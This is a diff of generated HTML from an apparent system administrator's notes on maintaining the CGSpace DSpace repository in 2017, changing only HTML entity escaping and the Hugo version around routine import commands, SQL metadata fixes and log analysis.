<pre tabindex="0"><code>$ JAVA_OPTS=&quot;-Xmx1024m -Dfile.encoding=UTF-8&quot; [dspace]/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/93843 --source /home/aorth/src/CIAT-Books/SimpleArchiveFormat/ --mapfile=/tmp/ciat-books.map &amp;&gt; /tmp/ciat-books.log
<pre tabindex="0"><code>$ JAVA_OPTS=&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34; [dspace]/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/93843 --source /home/aorth/src/CIAT-Books/SimpleArchiveFormat/ --mapfile=/tmp/ciat-books.map &amp;&gt; /tmp/ciat-books.log
</code></pre><ul>
<li>I went and did some basic sanity checks on the remaining items in the CIAT Book Chapters and decided they are mostly fine (except one duplicate and the flagged ones), so I imported them to DSpace Test too (162 items)</li>
<li>Total items in CIAT Book Chapters is 914, with the others being flagged for some reason, and we should send that back to CIAT</li>
@ -213,15 +213,15 @@
</li>
<li>Finally import 914 CIAT Book Chapters to CGSpace in two batches:</li>
</ul>
<pre tabindex="0"><code>$ JAVA_OPTS=&quot;-Xmx1024m -Dfile.encoding=UTF-8&quot; [dspace]/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/35701 --source /home/aorth/CIAT-Books/SimpleArchiveFormat/ --mapfile=/tmp/ciat-books.map &amp;&gt; /tmp/ciat-books.log
$ JAVA_OPTS=&quot;-Xmx1024m -Dfile.encoding=UTF-8&quot; [dspace]/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/35701 --source /home/aorth/CIAT-Books/SimpleArchiveFormat/ --mapfile=/tmp/ciat-books2.map &amp;&gt; /tmp/ciat-books2.log
<pre tabindex="0"><code>$ JAVA_OPTS=&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34; [dspace]/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/35701 --source /home/aorth/CIAT-Books/SimpleArchiveFormat/ --mapfile=/tmp/ciat-books.map &amp;&gt; /tmp/ciat-books.log
$ JAVA_OPTS=&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34; [dspace]/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/35701 --source /home/aorth/CIAT-Books/SimpleArchiveFormat/ --mapfile=/tmp/ciat-books2.map &amp;&gt; /tmp/ciat-books2.log
</code></pre><h2 id="2017-06-25">2017-06-25</h2>
<ul>
<li>WLE has said that one of their Phase II research themes is being renamed from <code>Regenerating Degraded Landscapes</code> to <code>Restoring Degraded Landscapes</code></li>
<li>Pull request with the changes to <code>input-forms.xml</code>: <a href="https://github.com/ilri/DSpace/pull/329">#329</a></li>
<li>As of now it doesn&rsquo;t look like there are any items using this research theme so we don&rsquo;t need to do any updates:</li>
</ul>
<pre tabindex="0"><code>dspace=# select text_value from metadatavalue where resource_type_id=2 and metadata_field_id=237 and text_value like 'Regenerating Degraded Landscapes%';
<pre tabindex="0"><code>dspace=# select text_value from metadatavalue where resource_type_id=2 and metadata_field_id=237 and text_value like &#39;Regenerating Degraded Landscapes%&#39;;
text_value
------------
(0 rows)

View File

@ -36,7 +36,7 @@ Merge changes for WLE Phase II theme rename (#329)
Looking at extracting the metadata registries from ICARDA&rsquo;s MEL DSpace database so we can compare fields with CGSpace
We can use PostgreSQL&rsquo;s extended output format (-x) plus sed to format the output into quasi XML:
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -132,7 +132,7 @@ We can use PostgreSQL&rsquo;s extended output format (-x) plus sed to format the
<li>Looking at extracting the metadata registries from ICARDA&rsquo;s MEL DSpace database so we can compare fields with CGSpace</li>
<li>We can use PostgreSQL&rsquo;s extended output format (<code>-x</code>) plus <code>sed</code> to format the output into quasi XML:</li>
</ul>
<pre tabindex="0"><code>$ psql dspacenew -x -c 'select element, qualifier, scope_note from metadatafieldregistry where metadata_schema_id=5 order by element, qualifier;' | sed -r 's:^-\[ RECORD (.*) \]-+$:&lt;/dc-type&gt;\n&lt;dc-type&gt;\n&lt;schema&gt;cg&lt;/schema&gt;:;s:([^ ]*) +\| (.*): &lt;\1&gt;\2&lt;/\1&gt;:;s:^$:&lt;/dc-type&gt;:;1s:&lt;/dc-type&gt;\n::'
<pre tabindex="0"><code>$ psql dspacenew -x -c &#39;select element, qualifier, scope_note from metadatafieldregistry where metadata_schema_id=5 order by element, qualifier;&#39; | sed -r &#39;s:^-\[ RECORD (.*) \]-+$:&lt;/dc-type&gt;\n&lt;dc-type&gt;\n&lt;schema&gt;cg&lt;/schema&gt;:;s:([^ ]*) +\| (.*): &lt;\1&gt;\2&lt;/\1&gt;:;s:^$:&lt;/dc-type&gt;:;1s:&lt;/dc-type&gt;\n::&#39;
</code></pre><ul>
<li>The <code>sed</code> script is from a post on the <a href="https://www.postgresql.org/message-id/437E44A5.508%40ultimeth.com">PostgreSQL mailing list</a></li>
<li>Abenet says the ILRI board wants to be able to have &ldquo;lead author&rdquo; for every item, so I&rsquo;ve whipped up a WIP test in the <code>5_x-lead-author</code> branch</li>
@ -151,7 +151,7 @@ We can use PostgreSQL&rsquo;s extended output format (-x) plus sed to format the
<li>Adjust WLE Research Theme to include both Phase I and II on the submission form according to editor feedback (<a href="https://github.com/ilri/DSpace/pull/330">#330</a>)</li>
<li>Generate list of fields in the current CGSpace <code>cg</code> scheme so we can record them properly in the metadata registry:</li>
</ul>
<pre tabindex="0"><code>$ psql dspace -x -c 'select element, qualifier, scope_note from metadatafieldregistry where metadata_schema_id=2 order by element, qualifier;' | sed -r 's:^-\[ RECORD (.*) \]-+$:&lt;/dc-type&gt;\n&lt;dc-type&gt;\n&lt;schema&gt;cg&lt;/schema&gt;:;s:([^ ]*) +\| (.*): &lt;\1&gt;\2&lt;/\1&gt;:;s:^$:&lt;/dc-type&gt;:;1s:&lt;/dc-type&gt;\n::' &gt; cg-types.xml
<pre tabindex="0"><code>$ psql dspace -x -c &#39;select element, qualifier, scope_note from metadatafieldregistry where metadata_schema_id=2 order by element, qualifier;&#39; | sed -r &#39;s:^-\[ RECORD (.*) \]-+$:&lt;/dc-type&gt;\n&lt;dc-type&gt;\n&lt;schema&gt;cg&lt;/schema&gt;:;s:([^ ]*) +\| (.*): &lt;\1&gt;\2&lt;/\1&gt;:;s:^$:&lt;/dc-type&gt;:;1s:&lt;/dc-type&gt;\n::&#39; &gt; cg-types.xml
</code></pre><ul>
<li>CGSpace was unavailable briefly, and I saw this error in the DSpace log file:</li>
</ul>
@ -211,7 +211,7 @@ org.postgresql.util.PSQLException: FATAL: remaining connection slots are reserve
<ul>
<li>Move two top-level communities to be sub-communities of ILRI Projects</li>
</ul>
<pre tabindex="0"><code>$ for community in 10568/2347 10568/25209; do /home/cgspace.cgiar.org/bin/dspace community-filiator --set --parent=10568/27629 --child=&quot;$community&quot;; done
<pre tabindex="0"><code>$ for community in 10568/2347 10568/25209; do /home/cgspace.cgiar.org/bin/dspace community-filiator --set --parent=10568/27629 --child=&#34;$community&#34;; done
</code></pre><ul>
<li>Discuss CGIAR Library data cleanup with Sisay and Abenet</li>
</ul>
@ -241,16 +241,16 @@ org.postgresql.util.PSQLException: FATAL: remaining connection slots are reserve
<ul>
<li>Looks like the final list of metadata corrections for CCAFS project tags will be:</li>
</ul>
<pre tabindex="0"><code>delete from metadatavalue where resource_type_id=2 and metadata_field_id=235 and text_value='PII-FP4_CRMWestAfrica';
update metadatavalue set text_value='FP3_VietnamLED' where resource_type_id=2 and metadata_field_id=134 and text_value='FP3_VeitnamLED';
update metadatavalue set text_value='PII-FP1_PIRCCA' where resource_type_id=2 and metadata_field_id=235 and text_value='PII-SEA_PIRCCA';
delete from metadatavalue where resource_type_id=2 and metadata_field_id=235 and text_value='PII-WA_IntegratedInterventions';
<pre tabindex="0"><code>delete from metadatavalue where resource_type_id=2 and metadata_field_id=235 and text_value=&#39;PII-FP4_CRMWestAfrica&#39;;
update metadatavalue set text_value=&#39;FP3_VietnamLED&#39; where resource_type_id=2 and metadata_field_id=134 and text_value=&#39;FP3_VeitnamLED&#39;;
update metadatavalue set text_value=&#39;PII-FP1_PIRCCA&#39; where resource_type_id=2 and metadata_field_id=235 and text_value=&#39;PII-SEA_PIRCCA&#39;;
delete from metadatavalue where resource_type_id=2 and metadata_field_id=235 and text_value=&#39;PII-WA_IntegratedInterventions&#39;;
</code></pre><ul>
<li>Now just waiting to run them on CGSpace, and then apply the modified input forms after Macaroni Bros give me an updated list</li>
<li>Temporarily increase the nginx upload limit to 200MB for Sisay to upload the CIAT presentations</li>
<li>Looking at CGSpace activity page, there are 52 Baidu bots concurrently crawling our website (I copied the activity page to a text file and grep it)!</li>
</ul>
<pre tabindex="0"><code>$ grep 180.76. /tmp/status | awk '{print $5}' | sort | uniq | wc -l
<pre tabindex="0"><code>$ grep 180.76. /tmp/status | awk &#39;{print $5}&#39; | sort | uniq | wc -l
52
</code></pre><ul>
<li>From looking at the <code>dspace.log</code> I see they are all using the same session, which means our Crawler Session Manager Valve is working</li>

View File

@ -60,7 +60,7 @@ This was due to newline characters in the dc.description.abstract column, which
I exported a new CSV from the collection on DSpace Test and then manually removed the characters in vim using g/^$/d
Then I cleaned up the author authorities and HTML characters in OpenRefine and sent the file back to Abenet
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -215,7 +215,7 @@ Then I cleaned up the author authorities and HTML characters in OpenRefine and s
<li>I need to get an author list from the database for only the CGIAR Library community to send to Peter</li>
<li>It turns out that I had already used this SQL query in <a href="/cgspace-notes/2017-05">May, 2017</a> to get the authors from CGIAR Library:</li>
</ul>
<pre tabindex="0"><code>dspace#= \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/93761', '10947/1', '10947/10', '10947/11', '10947/12', '10947/13', '10947/14', '10947/15', '10947/16', '10947/17', '10947/18', '10947/19', '10947/2', '10947/20', '10947/21', '10947/22', '10947/23', '10947/24', '10947/25', '10947/2512', '10947/2515', '10947/2516', '10947/2517', '10947/2518', '10947/2519', '10947/2520', '10947/2521', '10947/2522', '10947/2523', '10947/2524', '10947/2525', '10947/2526', '10947/2527', '10947/2528', '10947/2529', '10947/2530', '10947/2531', '10947/2532', '10947/2533', '10947/2534', '10947/2535', '10947/2536', '10947/2537', '10947/2538', '10947/2539', '10947/2540', '10947/2541', '10947/2589', '10947/26', '10947/2631', '10947/27', '10947/2708', '10947/2776', '10947/2782', '10947/2784', '10947/2786', '10947/2790', '10947/28', '10947/2805', '10947/2836', '10947/2871', '10947/2878', '10947/29', '10947/2900', '10947/2919', '10947/3', '10947/30', '10947/31', '10947/32', '10947/33', '10947/34', '10947/3457', '10947/35', '10947/36', '10947/37', '10947/38', '10947/39', '10947/4', '10947/40', '10947/4052', '10947/4054', '10947/4056', '10947/4068', '10947/41', '10947/42', '10947/43', '10947/4368', '10947/44', '10947/4467', '10947/45', '10947/4508', '10947/4509', '10947/4510', '10947/4573', '10947/46', '10947/4635', '10947/4636', '10947/4637', '10947/4638', '10947/4639', '10947/4651', '10947/4657', '10947/47', '10947/48', '10947/49', '10947/5', '10947/50', '10947/51', '10947/5308', '10947/5322', '10947/5324', '10947/5326', '10947/6', '10947/7', '10947/8', '10947/9'))) group by text_value order by count desc) to /tmp/cgiar-library-authors.csv with csv;
<pre tabindex="0"><code>dspace#= \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in (&#39;10568/93761&#39;, &#39;10947/1&#39;, &#39;10947/10&#39;, &#39;10947/11&#39;, &#39;10947/12&#39;, &#39;10947/13&#39;, &#39;10947/14&#39;, &#39;10947/15&#39;, &#39;10947/16&#39;, &#39;10947/17&#39;, &#39;10947/18&#39;, &#39;10947/19&#39;, &#39;10947/2&#39;, &#39;10947/20&#39;, &#39;10947/21&#39;, &#39;10947/22&#39;, &#39;10947/23&#39;, &#39;10947/24&#39;, &#39;10947/25&#39;, &#39;10947/2512&#39;, &#39;10947/2515&#39;, &#39;10947/2516&#39;, &#39;10947/2517&#39;, &#39;10947/2518&#39;, &#39;10947/2519&#39;, &#39;10947/2520&#39;, &#39;10947/2521&#39;, &#39;10947/2522&#39;, &#39;10947/2523&#39;, &#39;10947/2524&#39;, &#39;10947/2525&#39;, &#39;10947/2526&#39;, &#39;10947/2527&#39;, &#39;10947/2528&#39;, &#39;10947/2529&#39;, &#39;10947/2530&#39;, &#39;10947/2531&#39;, &#39;10947/2532&#39;, &#39;10947/2533&#39;, &#39;10947/2534&#39;, &#39;10947/2535&#39;, &#39;10947/2536&#39;, &#39;10947/2537&#39;, &#39;10947/2538&#39;, &#39;10947/2539&#39;, &#39;10947/2540&#39;, &#39;10947/2541&#39;, &#39;10947/2589&#39;, &#39;10947/26&#39;, &#39;10947/2631&#39;, &#39;10947/27&#39;, &#39;10947/2708&#39;, &#39;10947/2776&#39;, &#39;10947/2782&#39;, &#39;10947/2784&#39;, &#39;10947/2786&#39;, &#39;10947/2790&#39;, &#39;10947/28&#39;, &#39;10947/2805&#39;, &#39;10947/2836&#39;, &#39;10947/2871&#39;, &#39;10947/2878&#39;, &#39;10947/29&#39;, &#39;10947/2900&#39;, &#39;10947/2919&#39;, &#39;10947/3&#39;, &#39;10947/30&#39;, &#39;10947/31&#39;, &#39;10947/32&#39;, &#39;10947/33&#39;, &#39;10947/34&#39;, &#39;10947/3457&#39;, &#39;10947/35&#39;, &#39;10947/36&#39;, &#39;10947/37&#39;, &#39;10947/38&#39;, &#39;10947/39&#39;, &#39;10947/4&#39;, &#39;10947/40&#39;, &#39;10947/4052&#39;, &#39;10947/4054&#39;, &#39;10947/4056&#39;, &#39;10947/4068&#39;, &#39;10947/41&#39;, &#39;10947/42&#39;, &#39;10947/43&#39;, &#39;10947/4368&#39;, &#39;10947/44&#39;, &#39;10947/4467&#39;, &#39;10947/45&#39;, &#39;10947/4508&#39;, &#39;10947/4509&#39;, &#39;10947/4510&#39;, &#39;10947/4573&#39;, &#39;10947/46&#39;, &#39;10947/4635&#39;, &#39;10947/4636&#39;, &#39;10947/4637&#39;, &#39;10947/4638&#39;, &#39;10947/4639&#39;, &#39;10947/4651&#39;, &#39;10947/4657&#39;, &#39;10947/47&#39;, &#39;10947/48&#39;, &#39;10947/49&#39;, &#39;10947/5&#39;, &#39;10947/50&#39;, &#39;10947/51&#39;, &#39;10947/5308&#39;, &#39;10947/5322&#39;, &#39;10947/5324&#39;, &#39;10947/5326&#39;, &#39;10947/6&#39;, &#39;10947/7&#39;, &#39;10947/8&#39;, &#39;10947/9&#39;))) group by text_value order by count desc) to /tmp/cgiar-library-authors.csv with csv;
</code></pre><ul>
<li>Meeting with Peter and CGSpace team
<ul>
@ -242,7 +242,7 @@ Then I cleaned up the author authorities and HTML characters in OpenRefine and s
<li>I sent a message to the mailing list about the duplicate content issue with <code>/rest</code> and <code>/bitstream</code> URLs</li>
<li>Looking at the logs for the REST API on <code>/rest</code>, it looks like there is someone hammering doing testing or something on it&hellip;</li>
</ul>
<pre tabindex="0"><code># awk '{print $1}' /var/log/nginx/rest.log.1 | sort -n | uniq -c | sort -h | tail -n 5
<pre tabindex="0"><code># awk &#39;{print $1}&#39; /var/log/nginx/rest.log.1 | sort -n | uniq -c | sort -h | tail -n 5
140 66.249.66.91
404 66.249.66.90
1479 50.116.102.77
@ -270,9 +270,9 @@ Then I cleaned up the author authorities and HTML characters in OpenRefine and s
</code></pre><ul>
<li>There were only three deletions so I just did them manually:</li>
</ul>
<pre tabindex="0"><code>dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value='C';
<pre tabindex="0"><code>dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value=&#39;C&#39;;
DELETE 1
dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value='WSSD';
dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value=&#39;WSSD&#39;;
</code></pre><ul>
<li>Generate a new list of authors from the CGIAR Library community for Peter to look through now that the initial corrections have been done</li>
<li>Thinking about resource limits for PostgreSQL again after last week&rsquo;s CGSpace crash and related to a recently discussion I had in the comments of the <a href="https://wiki.lyrasis.org/display/cmtygp/DCAT+Meeting+April+2017">April, 2017 DCAT meeting notes</a></li>
@ -324,22 +324,22 @@ $ grep -rsI SQLException dspace-xmlui | wc -l
</code></pre><ul>
<li>And actually, we can do it for other generic fields for items in those collections, for example <code>dc.description.abstract</code>:</li>
</ul>
<pre tabindex="0"><code>dspace=# update metadatavalue set text_lang='en_US' where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'description' and qualifier = 'abstract') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/93761', '10947/1', '10947/10', '10947/11', '10947/12', '10947/13', '10947/14', '10947/15', '10947/16', '10947/17', '10947/18', '10947/19', '10947/2', '10947/20', '10947/21', '10947/22', '10947/23', '10947/24', '10947/25', '10947/2512', '10947/2515', '10947/2516', '10947/2517', '10947/2518', '10947/2519', '10947/2520', '10947/2521', '10947/2522', '10947/2523', '10947/2524', '10947/2525', '10947/2526', '10947/2527', '10947/2528', '10947/2529', '10947/2530', '10947/2531', '10947/2532', '10947/2533', '10947/2534', '10947/2535', '10947/2536', '10947/2537', '10947/2538', '10947/2539', '10947/2540', '10947/2541', '10947/2589', '10947/26', '10947/2631', '10947/27', '10947/2708', '10947/2776', '10947/2782', '10947/2784', '10947/2786', '10947/2790', '10947/28', '10947/2805', '10947/2836', '10947/2871', '10947/2878', '10947/29', '10947/2900', '10947/2919', '10947/3', '10947/30', '10947/31', '10947/32', '10947/33', '10947/34', '10947/3457', '10947/35', '10947/36', '10947/37', '10947/38', '10947/39', '10947/4', '10947/40', '10947/4052', '10947/4054', '10947/4056', '10947/4068', '10947/41', '10947/42', '10947/43', '10947/4368', '10947/44', '10947/4467', '10947/45', '10947/4508', '10947/4509', '10947/4510', '10947/4573', '10947/46', '10947/4635', '10947/4636', '10947/4637', '10947/4638', '10947/4639', '10947/4651', '10947/4657', '10947/47', '10947/48', '10947/49', '10947/5', '10947/50', '10947/51', '10947/5308', '10947/5322', '10947/5324', '10947/5326', '10947/6', '10947/7', '10947/8', '10947/9')))
<pre tabindex="0"><code>dspace=# update metadatavalue set text_lang=&#39;en_US&#39; where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;description&#39; and qualifier = &#39;abstract&#39;) AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in (&#39;10568/93761&#39;, &#39;10947/1&#39;, &#39;10947/10&#39;, &#39;10947/11&#39;, &#39;10947/12&#39;, &#39;10947/13&#39;, &#39;10947/14&#39;, &#39;10947/15&#39;, &#39;10947/16&#39;, &#39;10947/17&#39;, &#39;10947/18&#39;, &#39;10947/19&#39;, &#39;10947/2&#39;, &#39;10947/20&#39;, &#39;10947/21&#39;, &#39;10947/22&#39;, &#39;10947/23&#39;, &#39;10947/24&#39;, &#39;10947/25&#39;, &#39;10947/2512&#39;, &#39;10947/2515&#39;, &#39;10947/2516&#39;, &#39;10947/2517&#39;, &#39;10947/2518&#39;, &#39;10947/2519&#39;, &#39;10947/2520&#39;, &#39;10947/2521&#39;, &#39;10947/2522&#39;, &#39;10947/2523&#39;, &#39;10947/2524&#39;, &#39;10947/2525&#39;, &#39;10947/2526&#39;, &#39;10947/2527&#39;, &#39;10947/2528&#39;, &#39;10947/2529&#39;, &#39;10947/2530&#39;, &#39;10947/2531&#39;, &#39;10947/2532&#39;, &#39;10947/2533&#39;, &#39;10947/2534&#39;, &#39;10947/2535&#39;, &#39;10947/2536&#39;, &#39;10947/2537&#39;, &#39;10947/2538&#39;, &#39;10947/2539&#39;, &#39;10947/2540&#39;, &#39;10947/2541&#39;, &#39;10947/2589&#39;, &#39;10947/26&#39;, &#39;10947/2631&#39;, &#39;10947/27&#39;, &#39;10947/2708&#39;, &#39;10947/2776&#39;, &#39;10947/2782&#39;, &#39;10947/2784&#39;, &#39;10947/2786&#39;, &#39;10947/2790&#39;, &#39;10947/28&#39;, &#39;10947/2805&#39;, &#39;10947/2836&#39;, &#39;10947/2871&#39;, &#39;10947/2878&#39;, &#39;10947/29&#39;, &#39;10947/2900&#39;, &#39;10947/2919&#39;, &#39;10947/3&#39;, &#39;10947/30&#39;, &#39;10947/31&#39;, &#39;10947/32&#39;, &#39;10947/33&#39;, &#39;10947/34&#39;, &#39;10947/3457&#39;, &#39;10947/35&#39;, &#39;10947/36&#39;, &#39;10947/37&#39;, &#39;10947/38&#39;, &#39;10947/39&#39;, &#39;10947/4&#39;, &#39;10947/40&#39;, &#39;10947/4052&#39;, &#39;10947/4054&#39;, &#39;10947/4056&#39;, &#39;10947/4068&#39;, &#39;10947/41&#39;, &#39;10947/42&#39;, &#39;10947/43&#39;, &#39;10947/4368&#39;, &#39;10947/44&#39;, &#39;10947/4467&#39;, &#39;10947/45&#39;, &#39;10947/4508&#39;, &#39;10947/4509&#39;, &#39;10947/4510&#39;, &#39;10947/4573&#39;, &#39;10947/46&#39;, &#39;10947/4635&#39;, &#39;10947/4636&#39;, &#39;10947/4637&#39;, &#39;10947/4638&#39;, &#39;10947/4639&#39;, &#39;10947/4651&#39;, &#39;10947/4657&#39;, &#39;10947/47&#39;, &#39;10947/48&#39;, &#39;10947/49&#39;, &#39;10947/5&#39;, &#39;10947/50&#39;, &#39;10947/51&#39;, &#39;10947/5308&#39;, &#39;10947/5322&#39;, &#39;10947/5324&#39;, &#39;10947/5326&#39;, &#39;10947/6&#39;, &#39;10947/7&#39;, &#39;10947/8&#39;, &#39;10947/9&#39;)))
</code></pre><ul>
<li>And on others like <code>dc.language.iso</code>, <code>dc.relation.ispartofseries</code>, <code>dc.type</code>, <code>dc.title</code>, etc&hellip;</li>
<li>Also, to move fields from <code>dc.identifier.url</code> to <code>cg.identifier.url[en_US]</code> (because we don&rsquo;t use the Dublin Core one for some reason):</li>
</ul>
<pre tabindex="0"><code>dspace=# update metadatavalue set metadata_field_id = 219, text_lang = 'en_US' where resource_type_id = 2 AND metadata_field_id = 237;
<pre tabindex="0"><code>dspace=# update metadatavalue set metadata_field_id = 219, text_lang = &#39;en_US&#39; where resource_type_id = 2 AND metadata_field_id = 237;
UPDATE 15
</code></pre><ul>
<li>Set the text_lang of all <code>dc.identifier.uri</code> (Handle) fields to be NULL, just like default DSpace does:</li>
</ul>
<pre tabindex="0"><code>dspace=# update metadatavalue set text_lang=NULL where resource_type_id = 2 and metadata_field_id = 25 and text_value like 'http://hdl.handle.net/10947/%';
<pre tabindex="0"><code>dspace=# update metadatavalue set text_lang=NULL where resource_type_id = 2 and metadata_field_id = 25 and text_value like &#39;http://hdl.handle.net/10947/%&#39;;
UPDATE 4248
</code></pre><ul>
<li>Also update the text_lang of <code>dc.contributor.author</code> fields for metadata in these collections:</li>
</ul>
<pre tabindex="0"><code>dspace=# update metadatavalue set text_lang=NULL where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/93761', '10947/1', '10947/10', '10947/11', '10947/12', '10947/13', '10947/14', '10947/15', '10947/16', '10947/17', '10947/18', '10947/19', '10947/2', '10947/20', '10947/21', '10947/22', '10947/23', '10947/24', '10947/25', '10947/2512', '10947/2515', '10947/2516', '10947/2517', '10947/2518', '10947/2519', '10947/2520', '10947/2521', '10947/2522', '10947/2523', '10947/2524', '10947/2525', '10947/2526', '10947/2527', '10947/2528', '10947/2529', '10947/2530', '10947/2531', '10947/2532', '10947/2533', '10947/2534', '10947/2535', '10947/2536', '10947/2537', '10947/2538', '10947/2539', '10947/2540', '10947/2541', '10947/2589', '10947/26', '10947/2631', '10947/27', '10947/2708', '10947/2776', '10947/2782', '10947/2784', '10947/2786', '10947/2790', '10947/28', '10947/2805', '10947/2836', '10947/2871', '10947/2878', '10947/29', '10947/2900', '10947/2919', '10947/3', '10947/30', '10947/31', '10947/32', '10947/33', '10947/34', '10947/3457', '10947/35', '10947/36', '10947/37', '10947/38', '10947/39', '10947/4', '10947/40', '10947/4052', '10947/4054', '10947/4056', '10947/4068', '10947/41', '10947/42', '10947/43', '10947/4368', '10947/44', '10947/4467', '10947/45', '10947/4508', '10947/4509', '10947/4510', '10947/4573', '10947/46', '10947/4635', '10947/4636', '10947/4637', '10947/4638', '10947/4639', '10947/4651', '10947/4657', '10947/47', '10947/48', '10947/49', '10947/5', '10947/50', '10947/51', '10947/5308', '10947/5322', '10947/5324', '10947/5326', '10947/6', '10947/7', '10947/8', '10947/9')));
<pre tabindex="0"><code>dspace=# update metadatavalue set text_lang=NULL where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in (&#39;10568/93761&#39;, &#39;10947/1&#39;, &#39;10947/10&#39;, &#39;10947/11&#39;, &#39;10947/12&#39;, &#39;10947/13&#39;, &#39;10947/14&#39;, &#39;10947/15&#39;, &#39;10947/16&#39;, &#39;10947/17&#39;, &#39;10947/18&#39;, &#39;10947/19&#39;, &#39;10947/2&#39;, &#39;10947/20&#39;, &#39;10947/21&#39;, &#39;10947/22&#39;, &#39;10947/23&#39;, &#39;10947/24&#39;, &#39;10947/25&#39;, &#39;10947/2512&#39;, &#39;10947/2515&#39;, &#39;10947/2516&#39;, &#39;10947/2517&#39;, &#39;10947/2518&#39;, &#39;10947/2519&#39;, &#39;10947/2520&#39;, &#39;10947/2521&#39;, &#39;10947/2522&#39;, &#39;10947/2523&#39;, &#39;10947/2524&#39;, &#39;10947/2525&#39;, &#39;10947/2526&#39;, &#39;10947/2527&#39;, &#39;10947/2528&#39;, &#39;10947/2529&#39;, &#39;10947/2530&#39;, &#39;10947/2531&#39;, &#39;10947/2532&#39;, &#39;10947/2533&#39;, &#39;10947/2534&#39;, &#39;10947/2535&#39;, &#39;10947/2536&#39;, &#39;10947/2537&#39;, &#39;10947/2538&#39;, &#39;10947/2539&#39;, &#39;10947/2540&#39;, &#39;10947/2541&#39;, &#39;10947/2589&#39;, &#39;10947/26&#39;, &#39;10947/2631&#39;, &#39;10947/27&#39;, &#39;10947/2708&#39;, &#39;10947/2776&#39;, &#39;10947/2782&#39;, &#39;10947/2784&#39;, &#39;10947/2786&#39;, &#39;10947/2790&#39;, &#39;10947/28&#39;, &#39;10947/2805&#39;, &#39;10947/2836&#39;, &#39;10947/2871&#39;, &#39;10947/2878&#39;, &#39;10947/29&#39;, &#39;10947/2900&#39;, &#39;10947/2919&#39;, &#39;10947/3&#39;, &#39;10947/30&#39;, &#39;10947/31&#39;, &#39;10947/32&#39;, &#39;10947/33&#39;, &#39;10947/34&#39;, &#39;10947/3457&#39;, &#39;10947/35&#39;, &#39;10947/36&#39;, &#39;10947/37&#39;, &#39;10947/38&#39;, &#39;10947/39&#39;, &#39;10947/4&#39;, &#39;10947/40&#39;, &#39;10947/4052&#39;, &#39;10947/4054&#39;, &#39;10947/4056&#39;, &#39;10947/4068&#39;, &#39;10947/41&#39;, &#39;10947/42&#39;, &#39;10947/43&#39;, &#39;10947/4368&#39;, &#39;10947/44&#39;, &#39;10947/4467&#39;, &#39;10947/45&#39;, &#39;10947/4508&#39;, &#39;10947/4509&#39;, &#39;10947/4510&#39;, &#39;10947/4573&#39;, &#39;10947/46&#39;, &#39;10947/4635&#39;, &#39;10947/4636&#39;, &#39;10947/4637&#39;, &#39;10947/4638&#39;, &#39;10947/4639&#39;, &#39;10947/4651&#39;, &#39;10947/4657&#39;, &#39;10947/47&#39;, &#39;10947/48&#39;, &#39;10947/49&#39;, &#39;10947/5&#39;, &#39;10947/50&#39;, &#39;10947/51&#39;, &#39;10947/5308&#39;, &#39;10947/5322&#39;, &#39;10947/5324&#39;, &#39;10947/5326&#39;, &#39;10947/6&#39;, &#39;10947/7&#39;, &#39;10947/8&#39;, &#39;10947/9&#39;)));
UPDATE 4899
</code></pre><ul>
<li>Wow, I just wrote this baller regex facet to find duplicate authors:</li>
@ -370,7 +370,7 @@ java.io.StreamCorruptedException: invalid stream header: 00000000
</code></pre><ul>
<li>Weird that these errors seem to have started on August 11th, the same day we had capacity issues with PostgreSQL:</li>
</ul>
<pre tabindex="0"><code># grep -c &quot;ERROR net.sf.ehcache.store.DiskStore&quot; dspace.log.2017-08-*
<pre tabindex="0"><code># grep -c &#34;ERROR net.sf.ehcache.store.DiskStore&#34; dspace.log.2017-08-*
dspace.log.2017-08-01:0
dspace.log.2017-08-02:0
dspace.log.2017-08-03:0
@ -418,7 +418,7 @@ SELECT
?label
WHERE {
{ ?concept skos:altLabel ?label . } UNION { ?concept skos:prefLabel ?label . }
FILTER regex(str(?label), &quot;^fish&quot;, &quot;i&quot;) .
FILTER regex(str(?label), &#34;^fish&#34;, &#34;i&#34;) .
} LIMIT 10;
┌───────────────────────┐
@ -452,7 +452,7 @@ WHERE {
<li>Since I cleared the XMLUI cache on 2017-08-17 there haven&rsquo;t been any more <code>ERROR net.sf.ehcache.store.DiskStore</code> errors</li>
<li>Look at the CGIAR Library to see if I can find the items that have been submitted since May:</li>
</ul>
